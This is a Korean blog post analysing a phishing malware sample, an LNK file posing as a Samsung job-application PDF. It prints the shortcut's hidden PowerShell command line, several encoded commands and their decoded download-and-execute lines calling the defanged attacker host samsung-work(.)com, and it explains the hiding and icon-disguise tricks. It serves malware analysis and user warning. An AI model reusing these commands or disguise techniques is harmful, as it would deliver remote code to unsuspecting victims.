오늘은 대한민국의 대기업이자 국내 최대 규모의 다국적 기업이며 자본총액 기준 재계 서열 1위로 그 외 시가총액, 매출 등 기업 평가 요소의 거의 모든 영역에서 2위, 3위 그룹과 압도적 격차를 보이는 그냥 킹왕짱 인 기업입니다. 해당 악성코드는 삼성 영문 이력서로 속인 피싱 사이트 에 포함이 된 악성코드 하나 중입니다. 작년에 있었던 것으로 아마도 해외 사업부를 대상으로 한 것 같았습니다.
아무튼, 해당 악성코드는 PDF 파일인 것처럼 돼 있지만, 사실은 확장자를 잘 보면 LNK 파일인 것을 확인할 수가 있습니다.
아무튼, 해당 비슷하게 사이트 도 하나 만들고 SNS 도 만들고 유포를 한 적이 있었습니다.
해쉬
파일명:Samsung_Job_Application_Document.pdf.lnk
사이즈:48 MB
MD5:c2dbb808a94f755506367a63757d3007
SHA-1:9dc8794486160c1b282f50b1e2aa234c77c17c84
SHA-256:b55282e00322a4e28d888c1c252218251366f45639ba5212829e4b3d25dbc50e
악성코드에 포함된 파워셀 코드
StringData
{
namestring: not present
relativepath: ..\..\..\..\..\Windows\System32\cmd(.)exe
workingdir: C:\WINDOWS\system32
commandlinearguments: /c Power(S)hell -WindowStyle Hidden -Command "
IEX (Get-Content (Get-Child(I)tem -Path C:\ -Filter 'Samsungwork(.)bin'
-Recurse -Force -ErrorA(c)tion SilentlyContinue | Select-Object -First 1).FullName -Raw)"
iconlocation: C:\Program F(i)les (x86)\Microsoft\Edge\Application\msedge(.)exe
}코드 분석
1.cmd.exe를 통한 PowerShell 실행
..\..\..\..\..\Windows\System32\cmd.exe
상대 경로를 사용하여 cmd.exe를 호출함
실행 파일이 특정 위치에서 실행될 때 cmd.exe를 찾을 수 있도록 설계
악성코드는 실행 경로를 일반적인 패턴이 아닌 형태로 설정하여 탐지를 우회
commandlinearguments 를 보면 cmd.exe가 PowerShell을 실행하는 방식을 사용
-WindowStyle Hidden:PowerShell 창을 숨김 모드로 실행->사용자에게 노출되지 않음
IEX (Invoke-Expression):PowerShell에서 문자열을 코드로 실행하는 명령어
원격 코드 실행(RCE,Remote Code Execution) 공격에 자주 사용되고 있음
C:\ 드라이브 전체에서 Samsungwork.bin 파일을 검색
첫 번째로 발견된 파일을 Get-Content로 읽음
내용을 -Raw 옵션으로 그대로 가져오고 Invoke-Expression (IEX) 로 실행
Samsungwork.bin 파일 안의 내용을 코드로 실행하는 동작을 수행
해당 .bin 파일에 아주~쓸데없이 악성코드에 예술을 하고 그리고 그 밑에 파워셀 코드가 있음
2.Samsungwork.bin 파일을 이용한 페이로드 숨기기
Samsungwork.bin이라는 파일을 특정 경로가 아닌 전체 드라이브에서 찾도록 설정됨
-Recurse 옵션을 통해 하위 디렉터리까지 탐색->사용자나 보안 솔루션이 모니터 링하기 어려운 곳에서도 실행 가능
-Force 옵션을 사용하여 숨김 파일이나 시스템 보호 파일도 검색
.bin 파일 확장자를 사용함으로써 실행 파일처럼 보이지 않도록 위장할 가능성이 있음
.bin 내부에 PowerShell 코드나 셸 코드, 난독화된 명령어가 포함돼 있음
3. Edge 아이콘을 사용한 위장 (iconlocation)
실행 파일의 아이콘을 Microsoft Edge의 아이콘으로 설정
사용자가 실행 파일을 악성코드가 아닌 정상적인 브라우저 실행 파일로 착각하게 만드는 것이 목적
Samsungwork.bin에서는 쓸데없이 예술과 PowerShell 코드
powershell(.)exe -EncodedCommand SQBFAFgAIAAoAGkAcg(B)tA(C)AAJwBoA
HQAdABwAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvAHMA
dABv(A)HI(A)YQBnAGUALwBTAGE
AbQBzAHUAbgBnAF8AcABkAGYALgB0AHgAdAAnACkA
powershell(.)exe -EncodedCommand SQBFAFgAIAAoA(G)kAcgBtACAAJwBoAHQAd
(A)BwAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvA(H)(M)A
dABvAHIAYQBnAGUALwBTAGEAbQBzAHUAbgBnAC4AdAB4AHQAJwApAA==
powershell.exe -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQ(A)dAB
wAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvAHMAdABvAHIAY
QBnAGU(A)LwBTAGEAbQBzAHUAbgBnAHMAdAAuAHQAeAB0ACcAKQA=각각 Base64를 풀면 다음과 같습니다.
IEX (irm 'hxxps://samsung-work(.)com/storage/Samsung_pdf.txt')
IEX (irm 'hxxps://samsung-work(.)com/storage/Samsung(.)txt')
IEX (irm 'hxxps://samsung-work(.)com/storage/Samsungst(.)txt')
이며 Invoke-Expression (IEX)를 사용한 원격 코드 실행
IEX는 주어진 문자열을 PowerShell 코드로 실행하는 명령어 원격 코드 실행(RCE, Remote Code Execution)에 자주 악용이 되는 것이 특징입니다.
Invoke-RestMethod (irm)를 사용하여 외부 서버에서 PowerShell 스크립트를 다운로드하고 실행
즉 원격 서버(samsung-work(.)com)에서 악성 코드를 내려받아 실행함
원격 서버는 그냥 피싱 임
파일명 패턴 (Samsung_pdf.txt, Samsung.txt, Samsungst.txt)
.txt 확장자를 사용하여 정상적인 텍스트 파일처럼 보이도록 위장
하지만, 내부에는 PowerShell 코드 또는 난독화된 명령어가 많이 있음
PDF 내용은 다음과 같습니다.
CANDIDATE INFORMATION
Job application document
Info@samsung-workd(.)com
Patient:
Date :
When you choose a company recommended by Glassdoor, you not only get access to a professional working environment but
also receive outstanding benefits. With transparent information about benefits, employee reviews, and attractive compensation,
we are committed to providing job satisfaction as well as long-term development opportunities. This is a place where you can
develop your career in a positive, fair and promising environment.
대충 번역
지원자 정보
채용 지원서
Info@samsung-workd(.)com
환자:
날짜:
Glassdoor에서 추천한 회사를 선택하면 전문적인 근무 환경을 이용할 수 있을 뿐만 아니라.
뛰어난 혜택도 받을 수 있습니다. 혜택, 직원 리뷰, 매력적인 보상에 대한 투명한 정보를 통해
직무 만족과 장기적인 개발 기회를 제공하기 위해 온 힘을 다하고 있습니다. 이곳은 긍정적이고 공정하며 유망한 환경에서 경력을 개발할 수 있는 곳입니다.
뭐~이런 내용이고 해당 사이트는 폐쇄되었고 일단 이런 식의 피싱(Phishing)도 많이 사용을 하고 있으니 항상 주의하는 것을 권장합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| iOS 18.3.1 and iPadOS 18.3.1 이하 버전 CVE-2025-24016 취약점 (0) | 2025.02.27 |
|---|---|
| 네이버 명예훼손 게시중단(임시조치)로 위장한 피싱 메일 분석(2025.2.5) (0) | 2025.02.26 |
| 노드 VPN 스마트폰 IP 우회 변경 사용법(3개월 무료,신년 노드 VPN 70% 할인) (2) | 2025.02.25 |
| 북한 해킹 단체 코니(Konni) 에서 만든 악성코드-가상자산사업자 자금세탁방지 감독 방향(2025.2.18) (0) | 2025.02.24 |
| Winrar 7.10은 MOTW 데이터를 제거하여 윈도우 개인 정보 향상 (0) | 2025.02.21 |
| 모질라 파이어폭스 윈도우 7 2025년 9월까지 파이어폭스 지원 (0) | 2025.02.20 |
| 북한 코니(KONNI)에서 만든 악성코드-가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk(2025.1.23) (0) | 2025.02.20 |
| 애플 macOS 및 iOS 취약점 CVE-2024-54507 (0) | 2025.02.19 |
